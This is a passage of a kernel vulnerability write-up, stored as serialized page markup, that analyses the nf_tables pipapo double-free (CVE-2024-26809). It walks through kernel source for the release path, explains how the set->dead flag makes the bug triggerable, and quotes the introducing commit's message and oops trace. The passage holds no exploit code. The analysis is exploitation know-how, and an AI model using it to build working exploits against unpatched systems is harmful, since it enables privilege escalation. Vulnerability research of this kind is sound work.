list_del_init",{"type":26,"tag":137,"props":55616,"children":55617},{"style":5601},[55618],{"type":32,"value":165},{"type":26,"tag":137,"props":55620,"children":55621},{"style":5590},[55622],{"type":32,"value":5694},{"type":26,"tag":137,"props":55624,"children":55625},{"style":5584},[55626],{"type":32,"value":53622},{"type":26,"tag":137,"props":55628,"children":55629},{"style":5601},[55630],{"type":32,"value":16348},{"type":26,"tag":137,"props":55632,"children":55633},{"style":5584},[55634],{"type":32,"value":55324},{"type":26,"tag":137,"props":55636,"children":55637},{"style":5601},[55638],{"type":32,"value":6430},{"type":26,"tag":137,"props":55640,"children":55641},{"class":5559,"line":5878},[55642],{"type":26,"tag":137,"props":55643,"children":55644},{"emptyLinePlaceholder":18},[55645],{"type":32,"value":6276},{"type":26,"tag":137,"props":55647,"children":55648},{"class":5559,"line":5891},[55649,55653,55657,55661,55665,55669,55673,55677,55681,55685,55690,55694,55698,55702],{"type":26,"tag":137,"props":55650,"children":55651},{"style":5610},[55652],{"type":32,"value":33989},{"type":26,"tag":137,"props":55654,"children":55655},{"style":5601},[55656],{"type":32,"value":4625},{"type":26,"tag":137,"props":55658,"children":55659},{"style":5590},[55660],{"type":32,"value":23215},{"type":26,"tag":137,"props":55662,"children":55663},{"style":5584},[55664],{"type":32,"value":53622},{"type":26,"tag":137,"props":55666,"children":55667},{"style":5601},[55668],{"type":32,"value":16348},{"type":26,"tag":137,"props":55670,"children":55671},{"style":5584},[55672],{"type":32,"value":55273},{"type":26,"tag":137,"props":55674,"children":55675},{"style":5601},[55676],{"type":32,"value":16348},{"type":26,"tag":137,"props":55678,"children":55679},{"style":5584},[55680],{"type":32,"value":55282},{"type":26,"tag":137,"props":55682,"children":55683},{"style":5590},[55684],{"type":32,"value":26288},{"type":26,"tag":137,"props":55686,"children":55687},{"style":5584},[55688],{"type":32,"value":55689}," set",{"type":26,"tag":137,"props":55691,"children":55692},{"style":5601},[55693],{"type":32,"value":16348},{"type":26,"tag":137,"props":55695,"children":55696},{"style":5584},[55697],{"type":32,"value":55092},{"type":26,"tag":137,"props":55699,"children":55700},{"style":5601},[55701],{"type":32,"value":200},{"type":26,"tag":137,"props":55703,"children":55704},{"style":5564},[55705],{"type":32,"value":55706}," // [4]\n",{"type":26,"tag":137,"props":55708,"children":55709},{"class":5559,"line":5909},[55710,55714],{"type":26,"tag":137,"props":55711,"children":55712},{"style":5610},[55713],{"type":32,"value":54094},{"type":26,"tag":137,"props":55715,"children":55716},{"style":5601},[55717],{"type":32,"value":5604},{"type":26,"tag":137,"props":55719,"children":55720},{"class":5559,"line":5930},[55721],{"type":26,"tag":137,"props":55722,"children":55723},{"emptyLinePlaceholder":18},[55724],{"type":32,"value":6276},{"type":26,"tag":137,"props":55726,"children":55727},{"class":5559,"line":5939},[55728,55733,55737,55741,55745,55749,55754],{"type":26,"tag":137,"props":55729,"children":55730},{"style":5584},[55731],{"type":32,"value":55732},"  set",{"type":26,"tag":137,"props":55734,"children":55735},{"style":5601},[55736],{"type":32,"value":16348},{"type":26,"tag":137,"props":55738,"children":55739},{"style":5584},[55740],{"type":32,"value":55273},{"type":26,"tag":137,"props":55742,"children":55743},{"style":5601},[55744],{"type":32,"value":16348},{"type":26,"tag":137,"props":55746,"children":55747},{"style":5682},[55748],{"type":32,"value":55282},{"type":26,"tag":137,"props":55750,"children":55751},{"style":5601},[55752],{"type":32,"value":55753},"(set);",{"type":26,"tag":137,"props":55755,"children":55756},{"style":5564},[55757],{"type":32,"value":55758}," // [5]\n",{"type":26,"tag":137,"props":55760,"children":55761},{"class":5559,"line":6191},[55762],{"type":26,"tag":137,"props":55763,"children":55764},{"style":5601},[55765],{"type":32,"value":12185},{"type":26,"tag":137,"props":55767,"children":55768},{"class":5559,"line":6208},[55769],{"type":26,"tag":137,"props":55770,"children":55771},{"style":5601},[55772],{"type":32,"value":6507},{"type":26,"tag":35,"props":55774,"children":55775},{},[55776,55778,55784,55786,55791,55792,55797],{"type":32,"value":55777},"Later on, the ",{"type":26,"tag":130,"props":55779,"children":55781},{"className":55780},[],[55782],{"type":32,"value":55783},"nf_tables_commit_release()",{"type":32,"value":55785}," function is called to free any objects that were marked for release, and eventually calls the ",{"type":26,"tag":130,"props":55787,"children":55789},{"className":55788},[],[55790],{"type":32,"value":53622},{"type":32,"value":54942},{"type":26,"tag":130,"props":55793,"children":55795},{"className":55794},[],[55796],{"type":32,"value":54956},{"type":32,"value":55798}," method.",{"type":26,"tag":5512,"props":55800,"children":55802},{"className":19107,"code":55801,"language":4326,"meta":7,"style":7},"static void nf_tables_commit_release(struct net *net)\n{\n[...]\n schedule_work(&trans_destroy_work);\n[...]\n}\n[...]\nstatic void nf_tables_trans_destroy_work(struct work_struct *w)\n{\n[...]\n list_for_each_entry_safe(trans, next, &head, list) {\n  nft_trans_list_del(trans);\n  nft_commit_release(trans);\n }\n}\n[...]\nstatic void nft_commit_release(struct nft_trans *trans)\n{\n switch (trans->msg_type) {\n[...]\n case NFT_MSG_DELSET:\n case NFT_MSG_DESTROYSET:\n  nft_set_destroy(&trans->ctx, nft_trans_set(trans));\n[...]\n}\n[...]\nstatic void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)\n{\n[...]\n set->ops->destroy(ctx, set);\n[...]\n}\n",[55803],{"type":26,"tag":130,"props":55804,"children":55805},{"__ignoreMap":7},[55806,55845,55852,55859,55880,55887,55894,55901,55942,55949,55956,55977,55990,56002,56009,56016,56023,56064,56071,56099,56106,56119,56131,56172,56179,56186,56193,56251,56258,56265,56294,56301],{"type":26,"tag":137,"props":55807,"children":55808},{"class":5559,"line":5560},[55809,55813,55817,55821,55825,55829,55833,55837,55841],{"type":26,"tag":137,"props":55810,"children":55811},{"style":5573},[55812],{"type":32,"value":53647},{"type":26,"tag":137,"props":55814,"children":55815},{"style":5573},[55816],{"type":32,"value":53652},{"type":26,"tag":137,"props":55818,"children":55819},{"style":5682},[55820],{"type":32,"value":55449},{"type":26,"tag":137,"props":55822,"children":55823},{"style":5601},[55824],{"type":32,"value":165},{"type":26,"tag":137,"props":55826,"children":55827},{"style":5573},[55828],{"type":32,"value":11990},{"type":26,"tag":137,"props":55830,"children":55831},{"style":5601},[55832],{"type":32,"value":54605},{"type":26,"tag":137,"props":55834,"children":55835},{"style":5590},[55836],{"type":32,"value":7152},{"type":26,"tag":137,"props":55838,"children":55839},{"style":5584},[55840],{"type":32,"value":54614},{"type":26,"tag":137,"props":55842,"children":55843},{"style":5601},[55844],{"type":32,"value":5742},{"type":26,"tag":137,"props":55846,"children":55847},{"class":5559,"line":5412},[55848],{"type":26,"tag":137,"props":55849,"children":55850},{"style":5601},[55851],{"type":32,"value":13471},{"type":26,"tag":137,"props":55853,"children":55854},{"class":5559,"line":5417},[55855],{"type":26,"tag":137,"props":55856,"children":55857},{"style":5601},[55858],{"type":32,"value":12908},{"type":26,"tag":137,"props":55860,"children":55861},{"class":5559,"line":5642},[55862,55867,55871,55875],{"type":26,"tag":137,"props":55863,"children":55864},{"style":5682},[55865],{"type":32,"value":55866}," schedule_work",{"type":26,"tag":137,"props":55868,"children":55869},{"style":5601},[55870],{"type":32,"value":165},{"type":26,"tag":137,"props":55872,"children":55873},{"style":5590},[55874],{"type":32,"value":5694},{"type":26,"tag":137,"props":55876,"children":55877},{"style":5601},[55878],{"type":32,"value":55879},"trans_destroy_work);\n",{"type":26,"tag":137,"props":55881,"children":55882},{"class":5559,"line":5745},[55883],{"type":26,"tag":137,"props":55884,"children":55885},{"style":5601},[55886],{"type":32,"value":12908},{"type":26,"tag":137,"props":55888,"children":55889},{"class":5559,"line":5850},[55890],{"type":26,"tag":137,"props":55891,"children":55892},{"style":5601},[55893],{"type":32,"value":6507},{"type":26,"tag":137,"props":55895,"children":55896},{"class":5559,"line":5878},[55897],{"type":26,"tag":137,"props":55898,"children":55899},{"style":5601},[55900],{"type":32,"value":12908},{"type":26,"tag":137,"props":55902,"children":55903},{"class":5559,"line":5891},[55904,55908,55912,55917,55921,55925,55930,55934,55938],{"type":26,"tag":137,"props":55905,"children":55906},{"style":5573},[55907],{"type":32,"value":53647},{"type":26,"tag":137,"props":55909,"children":55910},{"style":5573},[55911],{"type":32,"value":53652},{"type":26,"tag":137,"props":55913,"children":55914},{"style":5682},[55915],{"type":32,"value":55916}," nf_tables_trans_destroy_work",{"type":26,"tag":137,"props":55918,"children":55919},{"style":5601},[55920],{"type":32,"value":165},{"type":26,"tag":137,"props":55922,"children":55923},{"style":5573},[55924],{"type":32,"value":11990},{"type":26,"tag":137,"props":55926,"children":55927},{"style":5601},[55928],{"type":32,"value":55929}," work_struct ",{"type":26,"tag":137,"props":55931,"children":55932},{"style":5590},[55933],{"type":32,"value":7152},{"type":26,"tag":137,"props":55935,"children":55936},{"style":5584},[55937],{"type":32,"value":52174},{"type":26,"tag":137,"props":55939,"children":55940},{"style":5601},[55941],{"type":32,"value":5742},{"type":26,"tag":137,"props":55943,"children":55944},{"class":5559,"line":5909},[55945],{"type":26,"tag":137,"props":55946,"children":55947},{"style":5601},[55948],{"type":32,"value":13471},{"type":26,"tag":137,"props":55950,"children":55951},{"class":5559,"line":5930},[55952],{"type":26,"tag":137,"props":55953,"children":55954},{"style":5601},[55955],{"type":32,"value":12908},{"type":26,"tag":137,"props":55957,"children":55958},{"class":5559,"line":5939},[55959,55963,55968,55972],{"type":26,"tag":137,"props":55960,"children":55961},{"style":5682},[55962],{"type":32,"value":55601},{"type":26,"tag":137,"props":55964,"children":55965},{"style":5601},[55966],{"type":32,"value":55967},"(trans, next, ",{"type":26,"tag":137,"props":55969,"children":55970},{"style":5590},[55971],{"type":32,"value":5694},{"type":26,"tag":137,"props":55973,"children":55974},{"style":5601},[55975],{"type":32,"value":55976},"head, list) {\n",{"type":26,"tag":137,"props":55978,"children":55979},{"class":5559,"line":6191},[55980,55985],{"type":26,"tag":137,"props":55981,"children":55982},{"style":5682},[55983],{"type":32,"value":55984},"  nft_trans_list_del",{"type":26,"tag":137,"props":55986,"children":55987},{"style":5601},[55988],{"type":32,"value":55989},"(trans);\n",{"type":26,"tag":137,"props":55991,"children":55992},{"class":5559,"line":6208},[55993,55998],{"type":26,"tag":137,"props":55994,"children":55995},{"style":5682},[55996],{"type":32,"value":55997},"  nft_commit_release",{"type":26,"tag":137,"props":55999,"children":56000},{"style":5601},[56001],{"type":32,"value":55989},{"type":26,"tag":137,"props":56003,"children":56004},{"class":5559,"line":6225},[56005],{"type":26,"tag":137,"props":56006,"children":56007},{"style":5601},[56008],{"type":32,"value":12185},{"type":26,"tag":137,"props":56010,"children":56011},{"class":5559,"line":6238},[56012],{"type":26,"tag":137,"props":56013,"children":56014},{"style":5601},[56015],{"type":32,"value":6507},{"type":26,"tag":137,"props":56017,"children":56018},{"class":5559,"line":6247},[56019],{"type":26,"tag":137,"props":56020,"children":56021},{"style":5601},[56022],{"type":32,"value":12908},{"type":26,"tag":137,"props":56024,"children":56025},{"class":5559,"line":6270},[56026,56030,56034,56039,56043,56047,56052,56056,56060],{"type":26,"tag":137,"props":56027,"children":56028},{"style":5573},[56029],{"type":32,"value":53647},{"type":26,"tag":137,"props":56031,"children":56032},{"style":5573},[56033],{"type":32,"value":53652},{"type":26,"tag":137,"props":56035,"children":56036},{"style":5682},[56037],{"type":32,"value":56038}," nft_commit_release",{"type":26,"tag":137,"props":56040,"children":56041},{"style":5601},[56042],{"type":32,"value":165},{"type":26,"tag":137,"props":56044,"children":56045},{"style":5573},[56046],{"type":32,"value":11990},{"type":26,"tag":137,"props":56048,"children":56049},{"style":5601},[56050],{"type":32,"value":56051}," nft_trans ",{"type":26,"tag":137,"props":56053,"children":56054},{"style":5590},[56055],{"type":32,"value":7152},{"type":26,"tag":137,"props":56057,"children":56058},{"style":5584},[56059],{"type":32,"value":55164},{"type":26,"tag":137,"props":56061,"children":56062},{"style":5601},[56063],{"type":32,"value":5742},{"type":26,"tag":137,"props":56065,"children":56066},{"class":5559,"line":6279},[56067],{"type":26,"tag":137,"props":56068,"children":56069},{"style":5601},[56070],{"type":32,"value":13471},{"type":26,"tag":137,"props":56072,"children":56073},{"class":5559,"line":6288},[56074,56079,56083,56087,56091,56095],{"type":26,"tag":137,"props":56075,"children":56076},{"style":5610},[56077],{"type":32,"value":56078}," switch",{"type":26,"tag":137,"props":56080,"children":56081},{"style":5601},[56082],{"type":32,"value":4625},{"type":26,"tag":137,"props":56084,"children":56085},{"style":5584},[56086],{"type":32,"value":55164},{"type":26,"tag":137,"props":56088,"children":56089},{"style":5601},[56090],{"type":32,"value":16348},{"type":26,"tag":137,"props":56092,"children":56093},{"style":5584},[56094],{"type":32,"value":55202},{"type":26,"tag":137,"props":56096,"children":56097},{"style":5601},[56098],{"type":32,"value":17395},{"type":26,"tag":137,"props":56100,"children":56101},{"class":5559,"line":6355},[56102],{"type":26,"tag":137,"props":56103,"children":56104},{"style":5601},[56105],{"type":32,"value":12908},{"type":26,"tag":137,"props":56107,"children":56108},{"class":5559,"line":6363},[56109,56114],{"type":26,"tag":137,"props":56110,"children":56111},{"style":5610},[56112],{"type":32,"value":56113}," case",{"type":26,"tag":137,"props":56115,"children":56116},{"style":5601},[56117],{"type":32,"value":56118}," NFT_MSG_DELSET:\n",{"type":26,"tag":137,"props":56120,"children":56121},{"class":5559,"line":6393},[56122,56126],{"type":26,"tag":137,"props":56123,"children":56124},{"style":5610},[56125],{"type":32,"value":56113},{"type":26,"tag":137,"props":56127,"children":56128},{"style":5601},[56129],{"type":32,"value":56130}," NFT_MSG_DESTROYSET:\n",{"type":26,"tag":137,"props":56132,"children":56133},{"class":5559,"line":6401},[56134,56139,56143,56147,56151,56155,56159,56163,56167],{"type":26,"tag":137,"props":56135,"children":56136},{"style":5682},[56137],{"type":32,"value":56138},"  nft_set_destroy",{"type":26,"tag":137,"props":56140,"children":56141},{"style":5601},[56142],{"type":32,"value":165},{"type":26,"tag":137,"props":56144,"children":56145},{"style":5590},[56146],{"type":32,"value":5694},{"type":26,"tag":137,"props":56148,"children":56149},{"style":5601},[56150],{"type":32,"value":55164},{"type":26,"tag":137,"props":56152,"children":56153},{"style":5590},[56154],{"type":32,"value":16348},{"type":26,"tag":137,"props":56156,"children":56157},{"style":5584},[56158],{"type":32,"value":22874},{"type":26,"tag":137,"props":56160,"children":56161},{"style":5601},[56162],{"type":32,"value":1108},{"type":26,"tag":137,"props":56164,"children":56165},{"style":5682},[56166],{"type":32,"value":55130},{"type":26,"tag":137,"props":56168,"children":56169},{"style":5601},[56170],{"type":32,"value":56171},"(trans));\n",{"type":26,"tag":137,"props":56173,"children":56174},{"class":5559,"line":6433},[56175],{"type":26,"tag":137,"props":56176,"children":56177},{"style":5601},[56178],{"type":32,"value":12908},{"type":26,"tag":137,"props":56180,"children":56181},{"class":5559,"line":6441},[56182],{"type":26,"tag":137,"props":56183,"children":56184},{"style":5601},[56185],{"type":32,"value":6507},{"type":26,"tag":137,"props":56187,"children":56188},{"class":5559,"line":6501},[56189],{"type":26,"tag":137,"props":56190,"children":56191},{"style":5601},[56192],{"type":32,"value":12908},{"type":26,"tag":137,"props":56194,"children":56195},{"class":5559,"line":11634},[56196,56200,56204,56209,56213,56217,56221,56225,56229,56234,56238,56242,56246],{"type":26,"tag":137,"props":56197,"children":56198},{"style":5573},[56199],{"type":32,"value":53647},{"type":26,"tag":137,"props":56201,"children":56202},{"style":5573},[56203],{"type":32,"value":53652},{"type":26,"tag":137,"props":56205,"children":56206},{"style":5682},[56207],{"type":32,"value":56208}," nft_set_destroy",{"type":26,"tag":137,"props":56210,"children":56211},{"style":5601},[56212],{"type":32,"value":165},{"type":26,"tag":137,"props":56214,"children":56215},{"style":5573},[56216],{"type":32,"value":12244},{"type":26,"tag":137,"props":56218,"children":56219},{"style":5573},[56220],{"type":32,"value":23744},{"type":26,"tag":137,"props":56222,"children":56223},{"style":5601},[56224],{"type":32,"value":53674},{"type":26,"tag":137,"props":56226,"children":56227},{"style":5590},[56228],{"type":32,"value":7152},{"type":26,"tag":137,"props":56230,"children":56231},{"style":5601},[56232],{"type":32,"value":56233},"ctx, ",{"type":26,"tag":137,"props":56235,"children":56236},{"style":5573},[56237],{"type":32,"value":11990},{"type":26,"tag":137,"props":56239,"children":56240},{"style":5601},[56241],{"type":32,"value":53702},{"type":26,"tag":137,"props":56243,"children":56244},{"style":5590},[56245],{"type":32,"value":7152},{"type":26,"tag":137,"props":56247,"children":56248},{"style":5601},[56249],{"type":32,"value":56250},"set)\n",{"type":26,"tag":137,"props":56252,"children":56253},{"class":5559,"line":11652},[56254],{"type":26,"tag":137,"props":56255,"children":56256},{"style":5601},[56257],{"type":32,"value":13471},{"type":26,"tag":137,"props":56259,"children":56260},{"class":5559,"line":11697},[56261],{"type":26,"tag":137,"props":56262,"children":56263},{"style":5601},[56264],{"type":32,"value":12908},{"type":26,"tag":137,"props":56266,"children":56267},{"class":5559,"line":11803},[56268,56272,56276,56280,56284,56289],{"type":26,"tag":137,"props":56269,"children":56270},{"style":5584},[56271],{"type":32,"value":55689},{"type":26,"tag":137,"props":56273,"children":56274},{"style":5601},[56275],{"type":32,"value":16348},{"type":26,"tag":137,"props":56277,"children":56278},{"style":5584},[56279],{"type":32,"value":55273},{"type":26,"tag":137,"props":56281,"children":56282},{"style":5601},[56283],{"type":32,"value":16348},{"type":26,"tag":137,"props":56285,"children":56286},{"style":5682},[56287],{"type":32,"value":56288},"destroy",{"type":26,"tag":137,"props":56290,"children":56291},{"style":5601},[56292],{"type":32,"value":56293},"(ctx, set);\n",{"type":26,"tag":137,"props":56295,"children":56296},{"class":5559,"line":26089},[56297],{"type":26,"tag":137,"props":56298,"children":56299},{"style":5601},[56300],{"type":32,"value":12908},{"type":26,"tag":137,"props":56302,"children":56303},{"class":5559,"line":26124},[56304],{"type":26,"tag":137,"props":56305,"children":56306},{"style":5601},[56307],{"type":32,"value":6507},{"type":26,"tag":35,"props":56309,"children":56310},{},[56311,56313,56318,56320,56325,56327,56333,56335,56340,56342,56347,56349,56353,56355,56360,56361,56365,56367,56373],{"type":32,"value":56312},"It may appear as if it would be impossible to make ",{"type":26,"tag":130,"props":56314,"children":56316},{"className":56315},[],[56317],{"type":32,"value":53576},{"type":32,"value":56319}," true in the release step because the ",{"type":26,"tag":130,"props":56321,"children":56323},{"className":56322},[],[56324],{"type":32,"value":54948},{"type":32,"value":56326}," method is always invoked first...\nHowever, one last piece brings this bug to life: the ",{"type":26,"tag":130,"props":56328,"children":56330},{"className":56329},[],[56331],{"type":32,"value":56332},"set->dead",{"type":32,"value":56334}," flag. If a ",{"type":26,"tag":130,"props":56336,"children":56338},{"className":56337},[],[56339],{"type":32,"value":53622},{"type":32,"value":56341}," was marked for deletion, it receives the ",{"type":26,"tag":130,"props":56343,"children":56345},{"className":56344},[],[56346],{"type":32,"value":56332},{"type":32,"value":56348}," flag ",{"type":26,"tag":137,"props":56350,"children":56351},{},[56352],{"type":32,"value":277},{"type":32,"value":56354},". If this flag is set, then the commit path will skip any commitments to this ",{"type":26,"tag":130,"props":56356,"children":56358},{"className":56357},[],[56359],{"type":32,"value":53622},{"type":32,"value":1011},{"type":26,"tag":137,"props":56362,"children":56363},{},[56364],{"type":32,"value":3235},{"type":32,"value":56366},". This is extremely convenient for us and will allow us to trigger the double-free because the ",{"type":26,"tag":130,"props":56368,"children":56370},{"className":56369},[],[56371],{"type":32,"value":56372},"priv ->dirty",{"type":32,"value":56374}," flag is not cleared when it should have been.",{"type":26,"tag":92,"props":56376,"children":56378},{"id":56377},"tracing-the-guilty-commit",[56379],{"type":32,"value":56380},"Tracing the guilty commit",{"type":26,"tag":35,"props":56382,"children":56383},{},[56384,56386,56393,56395,56401,56403,56408,56410,56416],{"type":32,"value":56385},"The above scenario raises some interesting suppositions about how this vulnerability was introduced. See, any ",{"type":26,"tag":41,"props":56387,"children":56390},{"href":56388,"rel":56389},"https://ubuntu.com/security/CVE-2024-26809",[45],[56391],{"type":32,"value":56392},"advisories",{"type":32,"value":56394}," about this vulnerability will say it was introduced by this ",{"type":26,"tag":41,"props":56396,"children":56399},{"href":56397,"rel":56398},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",[45],[56400],{"type":32,"value":55282},{"type":32,"value":56402},", which sounds fair considering this added the weird code that frees twice in the same path. However, by checking the blame on the ",{"type":26,"tag":130,"props":56404,"children":56406},{"className":56405},[],[56407],{"type":32,"value":56332},{"type":32,"value":56409}," flag, which was what actually made this exploitable, we will learn that it was only introduced over a year after the commit above in this ",{"type":26,"tag":41,"props":56411,"children":56414},{"href":56412,"rel":56413},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26",[45],[56415],{"type":32,"value":55282},{"type":32,"value":470},{"type":26,"tag":35,"props":56418,"children":56419},{},[56420],{"type":32,"value":56421},"By reading the message of the first commit, we can finally understand why this code was added:",{"type":26,"tag":5512,"props":56423,"children":56427},{"className":56424,"code":56425,"language":56426,"meta":7,"style":7},"language-txt shiki shiki-themes slack-dark","New elements that reside in the clone are not released in case that the\ntransaction is aborted.\n\n[16302.231754] ------------[ cut here ]------------\n[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[...]\n[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G        W         5.19.0-rc3+ #155\n[...]\n[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n[...]\n[16302.231917] Call Trace:\n[16302.231919]  \u003CTASK>\n[16302.231921]  __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n[16302.231934]  nf_tables_abort+0x30/0x50 [nf_tables]\n[16302.231946]  nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n[16302.231952]  ? __nla_validate_parse+0x48/0x190\n[16302.231959]  nfnetlink_rcv+0x110/0x129 [nfnetlink]\n[16302.231963]  netlink_unicast+0x211/0x340\n[16302.231969]  netlink_sendmsg+0x21e/0x460\n\nAdd nft_set_pipapo_match_destroy() helper function to release the\nelements in the lookup tables.\n\nStefano Brivio says: \"We additionally look for elements pointers in the\ncloned matching data if priv->dirty is set, because that means that\ncloned data might point to additional elements we did not commit to the\nworking copy yet (such as the abort path case, but perhaps not limited\nto it).\"\n\nFixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\nReviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\nSigned-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n","txt",[56428],{"type":26,"tag":130,"props":56429,"children":56430},{"__ignoreMap":7},[56431,56439,56447,56454,56462,56470,56477,56485,56492,56500,56508,56515,56523,56531,56539,56547,56555,56563,56571,56579,56587,56594,56602,56610,56617,56625,56633,56641,56649,56657,56664,56672,56680],{"type":26,"tag":137,"props":56432,"children":56433},{"class":5559,"line":5560},[56434],{"type":26,"tag":137,"props":56435,"children":56436},{},[56437],{"type":32,"value":56438},"New elements that reside in the clone are not released in case that the\n",{"type":26,"tag":137,"props":56440,"children":56441},{"class":5559,"line":5412},[56442],{"type":26,"tag":137,"props":56443,"children":56444},{},[56445],{"type":32,"value":56446},"transaction is aborted.\n",{"type":26,"tag":137,"props":56448,"children":56449},{"class":5559,"line":5417},[56450],{"type":26,"tag":137,"props":56451,"children":56452},{"emptyLinePlaceholder":18},[56453],{"type":32,"value":6276},{"type":26,"tag":137,"props":56455,"children":56456},{"class":5559,"line":5642},[56457],{"type":26,"tag":137,"props":56458,"children":56459},{},[56460],{"type":32,"value":56461},"[16302.231754] ------------[ cut here ]------------\n",{"type":26,"tag":137,"props":56463,"children":56464},{"class":5559,"line":5745},[56465],{"type":26,"tag":137,"props":56466,"children":56467},{},[56468],{"type":32,"value":56469},"[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":26,"tag":137,"props":56471,"children":56472},{"class":5559,"line":5850},[56473],{"type":26,"tag":137,"props":56474,"children":56475},{},[56476],{"type":32,"value":12908},{"type":26,"tag":137,"props":56478,"children":56479},{"class":5559,"line":5878},[56480],{"type":26,"tag":137,"props":56481,"children":56482},{},[56483],{"type":32,"value":56484},"[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G        W         5.19.0-rc3+ #155\n",{"type":26,"tag":137,"props":56486,"children":56487},{"class":5559,"line":5891},[56488],{"type":26,"tag":137,"props":56489,"children":56490},{},[56491],{"type":32,"value":12908},{"type":26,"tag":137,"props":56493,"children":56494},{"class":5559,"line":5909},[56495],{"type":26,"tag":137,"props":56496,"children":56497},{},[56498],{"type":32,"value":56499},"[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":26,"tag":137,"props":56501,"children":56502},{"class":5559,"line":5930},[56503],{"type":26,"tag":137,"props":56504,"children":56505},{},[56506],{"type":32,"value":56507},"[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n",{"type":26,"tag":137,"props":56509,"children":56510},{"class":5559,"line":5939},[56511],{"type":26,"tag":137,"props":56512,"children":56513},{},[56514],{"type":32,"value":12908},{"type":26,"tag":137,"props":56516,"children":56517},{"class":5559,"line":6191},[56518],{"type":26,"tag":137,"props":56519,"children":56520},{},[56521],{"type":32,"value":56522},"[16302.231917] Call Trace:\n",{"type":26,"tag":137,"props":56524,"children":56525},{"class":5559,"line":6208},[56526],{"type":26,"tag":137,"props":56527,"children":56528},{},[56529],{"type":32,"value":56530},"[16302.231919]  \u003CTASK>\n",{"type":26,"tag":137,"props":56532,"children":56533},{"class":5559,"line":6225},[56534],{"type":26,"tag":137,"props":56535,"children":56536},{},[56537],{"type":32,"value":56538},"[16302.231921]  __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n",{"type":26,"tag":137,"props":56540,"children":56541},{"class":5559,"line":6238},[56542],{"type":26,"tag":137,"props":56543,"children":56544},{},[56545],{"type":32,"value":56546},"[16302.231934]  nf_tables_abort+0x30/0x50 [nf_tables]\n",{"type":26,"tag":137,"props":56548,"children":56549},{"class":5559,"line":6247},[56550],{"type":26,"tag":137,"props":56551,"children":56552},{},[56553],{"type":32,"value":56554},"[16302.231946]  nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n",{"type":26,"tag":137,"props":56556,"children":56557},{"class":5559,"line":6270},[56558],{"type":26,"tag":137,"props":56559,"children":56560},{},[56561],{"type":32,"value":56562},"[16302.231952]  ? __nla_validate_parse+0x48/0x190\n",{"type":26,"tag":137,"props":56564,"children":56565},{"class":5559,"line":6279},[56566],{"type":26,"tag":137,"props":56567,"children":56568},{},[56569],{"type":32,"value":56570},"[16302.231959]  nfnetlink_rcv+0x110/0x129 [nfnetlink]\n",{"type":26,"tag":137,"props":56572,"children":56573},{"class":5559,"line":6288},[56574],{"type":26,"tag":137,"props":56575,"children":56576},{},[56577],{"type":32,"value":56578},"[16302.231963]  netlink_unicast+0x211/0x340\n",{"type":26,"tag":137,"props":56580,"children":56581},{"class":5559,"line":6355},[56582],{"type":26,"tag":137,"props":56583,"children":56584},{},[56585],{"type":32,"value":56586},"[16302.231969]  netlink_sendmsg+0x21e/0x460\n",{"type":26,"tag":137,"props":56588,"children":56589},{"class":5559,"line":6363},[56590],{"type":26,"tag":137,"props":56591,"children":56592},{"emptyLinePlaceholder":18},[56593],{"type":32,"value":6276},{"type":26,"tag":137,"props":56595,"children":56596},{"class":5559,"line":6393},[56597],{"type":26,"tag":137,"props":56598,"children":56599},{},[56600],{"type":32,"value":56601},"Add nft_set_pipapo_match_destroy() helper function to release the\n",{"type":26,"tag":137,"props":56603,"children":56604},{"class":5559,"line":6401},[56605],{"type":26,"tag":137,"props":56606,"children":56607},{},[56608],{"type":32,"value":56609},"elements in the lookup tables.\n",{"type":26,"tag":137,"props":56611,"children":56612},{"class":5559,"line":6433},[56613],{"type":26,"tag":137,"props":56614,"children":56615},{"emptyLinePlaceholder":18},[56616],{"type":32,"value":6276},{"type":26,"tag":137,"props":56618,"children":56619},{"class":5559,"line":6441},[56620],{"type":26,"tag":137,"props":56621,"children":56622},{},[56623],{"type":32,"value":56624},"Stefano Brivio says: \"We additionally look for elements pointers in the\n",{"type":26,"tag":137,"props":56626,"children":56627},{"class":5559,"line":6501},[56628],{"type":26,"tag":137,"props":56629,"children":56630},{},[56631],{"type":32,"value":56632},"cloned matching data if priv->dirty is set, because that means that\n",{"type":26,"tag":137,"props":56634,"children":56635},{"class":5559,"line":11634},[56636],{"type":26,"tag":137,"props":56637,"children":56638},{},[56639],{"type":32,"value":56640},"cloned data might point to additional elements we did not commit to the\n",{"type":26,"tag":137,"props":56642,"children":56643},{"class":5559,"line":11652},[56644],{"type":26,"tag":137,"props":56645,"children":56646},{},[56647],{"type":32,"value":56648},"working copy yet (such as the abort path case, but perhaps not 